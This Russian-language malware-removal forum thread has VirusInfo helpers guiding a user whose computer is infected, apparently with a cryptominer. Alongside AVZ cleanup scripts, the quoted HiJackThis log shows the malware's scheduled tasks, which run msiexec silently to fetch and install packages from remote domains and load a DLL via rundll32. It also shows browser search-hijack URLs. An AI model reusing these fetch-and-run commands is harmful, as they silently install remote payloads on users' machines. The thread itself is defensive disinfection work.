хелп ми...я даун.ЫЫ.скинули программу открыл,а там вирусня хехе...
Printable View
хелп ми...я даун.ЫЫ.скинули программу открыл,а там вирусня хехе...
Уважаемый(ая) [B]Артурsaas[/B], спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Здравствуйте.
[QUOTE]Система загружена в режиме защиты от сбоев (SafeMode)
[/QUOTE]
Логи из безопасного режима не информативны. Сделайте логи из обычного режима (можно с отключенным сетевым адаптером). Вижу, что заражены майнером.
[QUOTE=mike 1;1495265]Здравствуйте.
Логи из безопасного режима не информативны. Сделайте логи из обычного режима (можно с отключенным сетевым адаптером). Вижу, что заражены майнером.[/QUOTE]
Здраствуйте.Дело в том что когда я запускаю программу не в save mode то комп зависает хд
мы можем пройти в дискорд?
[url]https://discord.gg/zWJStS[/url]
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
я сделал что вы просили) Посмотрите снова файл
.
[B][COLOR="#FF0000"]Внимание![/COLOR][/B] Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе [url=http://virusinfo.info/forumdisplay.php?f=46]Лечение компьютерных вирусов[/url] и выполните [url=http://virusinfo.info/content.php?r=136-pravila]Правила оформления запроса о помощи[/url].
Здравствуйте!
Закройте все программы, [URL="http://virusinfo.info/showthread.php?t=130828"][B]временно[/B] выгрузите антивирус, файрволл и прочее защитное ПО[/URL].
[B][COLOR="#000080"]Важно![/COLOR][/B] на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. [URL="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в АВЗ[/URL] (Файл - Выполнить скрипт):
[CODE]
begin
QuarantineFile('C:\Program Files (x86)\WsxLtZnpU\bXClVo.dll','');
QuarantineFile('B:\steam\steamapps\common\wallpaper_engine\wallpaper32.exe','');
DeleteFile('C:\Program Files (x86)\WsxLtZnpU\bXClVo.dll','32');
DeleteFile('C:\WINDOWS\Tasks\NVQvXnIpQfoDOKq.job','32');
DeleteFile('C:\WINDOWS\system32\Tasks\naiohtkejhwe','64');
DeleteFile('C:\WINDOWS\system32\Tasks\NVQvXnIpQfoDOKq','64');
DeleteFile('C:\WINDOWS\system32\Tasks\xzkuplmbod','64');
DeleteFile('C:\WINDOWS\system32\Tasks\{15C0CDFA-890C-8814-92A7-D8E31C55C82B}','64');
ExecuteSysClean;
RebootWindows(true);
end.
[/CODE]
[B]Внимание![/B] Будет выполнена перезагрузка компьютера. После перезагрузки компьютера [URL="http://virusinfo.info/showthread.php?t=7239"]выполните скрипт[/URL] в АВЗ:
[CODE]begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.[/CODE]
Пришлите карантин согласно Приложения 2 правил по красной ссылке [B]Прислать запрошенный карантин[/B] вверху темы
[URL="http://virusinfo.info/showthread.php?t=165835"]Пофиксите[/URL] следующие строчки в HiJackThis.
[CODE]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuAtDVAwTZTYVmiPrdy95UXxT1x9g6dTzr2BYxvQ6o-OETz51ebox513BAne-txy7yXXyHdcYKz_BuGerDX8nSseq-cazJaNkxtjipl1__9wDhb56sopnsx5HMTDFvSA8F3WeIrJXyBOvuuGAV8sI-g-mK7AFw,,&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuAtDVAwTZTYVmiPrdy95UXxT1x9g6dTzr2BYxvQ6o-OETz51ebox513BAne-txy7yXXyHdcYKz_BuGerDX8nSseq-cazJaNkxtjipl1__9wDhb56sopnsx5HMTDFvSA8F3WeIrJXyBOvuuGAV8sI-g-mK7AFw,,&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuAtDVAwTZTYVmiPrdy95UXxT1x9g6dTzr2BYxvQ6o-OETz51ebox513BAne-txy7yXbQAKa_BT4lnm5T9ODWsSLiwIszgYEjeRdx-Ubuidk5g9b50zImaYH9VEERX7jXgdA4Sd150cc3yolGDLG-UV7LQ_7UA,,
R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuAtDVAwTZTYVmiPrdy95UXxT1x9g6dTzr2BYxvQ6o-OETz51ebox513BAne-txy7yXXyHdcYKz_BuGerDX8nSseq-cazJaNkxtjipl1__9wDhb56sopnsx5HMTDFvSA8F3WeIrJXyBOvuuGAV8sI-g-mK7AFw,,&q={searchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuAtDVAwTZTYVmiPrdy95UXxT1x9g6dTzr2BYxvQ6o-OETz51ebox513BAne-txy7yXXyHdcYKz_BuGerDX8nSseq-cazJaNkxtjipl1__9wDhb56sopnsx5HMTDFvSA8F3WeIrJXyBOvuuGAV8sI-g-mK7AFw,,&q={searchTerms}
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (.job): (Not scheduled) NVQvXnIpQfoDOKq.job - C:\WINDOWS\system32\rundll32.exe "C:\Program Files (x86)\WsxLtZnpU\bXClVo.dll",#1
O22 - Task: NVQvXnIpQfoDOKq - C:\WINDOWS\system32\rundll32.exe "C:\Program Files (x86)\WsxLtZnpU\bXClVo.dll",#1
O22 - Task: naiohtkejhwe - C:\WINDOWS\system32\msiexec.exe /q -package https://superdomain1709.info/sxbmgo.dpp
O22 - Task: xzkuplmbod - C:\WINDOWS\system32\msiexec.exe -package https://superdomain1709.info/dikisyeatcin.uqh /q
O22 - Task: {15C0CDFA-890C-8814-92A7-D8E31C55C82B} - C:\WINDOWS\system32\msiexec.exe -i https://refreshnerer711rb.info/N589pmNIn81.2V2 -q
[/CODE]
Деинсталлируйте SpyHunter 5.
[LIST=1][*]Скачайте [B][URL="https://yadi.sk/d/6A65LkI1WEuqC"]Universal Virus Sniffer[/URL][/B] (uVS)[*]Извлеките uVS из [I]архива[/I] или из [I]zip-папки[/I]. Откройте папку с UVS и запустите файл [B]start.exe[/B]. В открывшимся окне выберите пункт [B]"Запустить под текущим пользователем"[/B].[*]Выберите меню [B]"Файл"[/B] => [B]"Сохранить полный образ автозапуска"[/B]. Программа предложит вам указать место сохранения лога в формате [B]"имя_компьютера_дата_сканирования"[/B]. Лог необходимо сохранить на рабочем столе.
[INDENT][SIZE="1"][B]!!!Внимание.[/B] Если у вас установлены архиваторы [B]WinRAR[/B] или [B]7-Zip[/B], то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.[/SIZE][/INDENT][*]Дождитесь окончания работы программы и прикрепите лог к посту в теме.
[INDENT][SIZE="1"][B]!!! Обратите внимание[/B], что утилиты необходимо запускать от имени Администратора. По умолчанию в [B]Windows XP[/B] так и есть. В [B]Windows Vista[/B] и [B]Windows 7[/B] администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать [B]Запуск от имени Администратора[/B], при необходимости укажите пароль администратора и нажмите [B]"Да"[/B].[/SIZE][/INDENT][*][/LIST]
[url]https://virusinfo.info/showthread.php?t=221597&p=1495280#post1495280[/url]
Майнер вроде..
Лог uVS не так собрали как я просил.